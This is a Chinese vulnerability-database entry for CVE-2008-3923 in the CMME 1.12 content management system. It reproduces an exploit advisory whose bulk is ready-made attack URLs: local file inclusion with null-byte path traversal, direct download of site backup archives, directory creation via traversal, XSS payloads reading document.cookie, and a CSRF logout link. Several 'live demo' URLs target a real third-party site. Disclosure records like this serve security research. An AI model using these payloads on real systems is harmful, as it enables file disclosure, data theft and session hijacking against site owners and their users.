https://www.exploit-db.com/exploits/6313
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-071
CMME 'statistics.php'跨站攻击漏洞






漏洞ID | 1115971 | 漏洞类型 | 跨站脚本 |
发布时间 | 2008-08-26 | 更新时间 | 2009-01-29 |
![]() |
CVE-2008-3923 | ![]() |
CNNVD-200809-071 |
漏洞平台 | PHP | CVSS评分 | 4.3 |
|漏洞来源
|漏洞详情
ContentManagementMadeEasy是一款开源的基于php的内容管理系统。ContentManagementMadeEasy(CMME)1.12版本中的statistics.php存在多个跨站脚本攻击漏洞。远程攻击者可以借助hstat_year操作中的页参数和年参数,注入任意的web脚本或HTML。
|漏洞EXP
##################################################################################################################
[+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##################################################################################################################
[+] Local File Inclusion
Note : magic_quotes_gpc must be off.
Example :
http://localhost/index.php?page=weblog&env=[Local File]%00
PoC :
http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00
[+] Download Backup
Example 1:
http://localhost/backup/[Backup Name].zip
PoC 1:
http://localhost/backup/cmme_data.zip
Live Demo 1:
http://cmme.oesterholt.net/backup/cmme_data.zip
Example 2:
http://localhost/backup/[Backup Name].zip
PoC 2:
http://localhost/backup/cmme_cmme.zip
Live Demo 2:
http://cmme.oesterholt.net/backup/cmme_cmme.zip
[+] Make Directory
You can make multiple directories in website root folder.
Example 1:
http://localhost/admin.php?action=login&page=home&script=index.php&env=[Directory]
PoC 1:
http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!!
Or you can make dir in previous directory,etc.
Example 2:
http://localhost/admin.php?action=login&page=home&script=index.php&env=../[Directory]
PoC 2:
http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!!
[+] Cross Site Scripting
Example 1:
http://localhost/statistics.php?action=hstat_year&page=[XSS}&env=data
PoC 1:
http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data
Live Demo 1:
http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data
Example 2:
http://localhost/statistics.php?action=hstat_year&year=[XSS]&env=data
PoC 2:
http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data
Live Demo 2:
http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data
[+] Cross Site Request Forgery
If an logged in user with administrator privileges clicks the following link he will be logged out.
http://localhost/admin.php?action=logout&page=home&env=data
##################################################################################################################
# milw0rm.com [2008-08-26]
|参考资料
来源:XF
名称:cmme-statistics-xss(44685)
链接:http://xforce.iss.net/xforce/xfdb/44685
来源:BID
名称:30854
链接:http://www.securityfocus.com/bid/30854
来源:MILW0RM
名称:6313
链接:http://www.milw0rm.com/exploits/6313
来源:SREASON
名称:4220
链接:http://securityreason.com/securityalert/4220
来源:SECUNIA
名称:31599
链接:http://secunia.com/advisories/31599
检索漏洞
开始时间
结束时间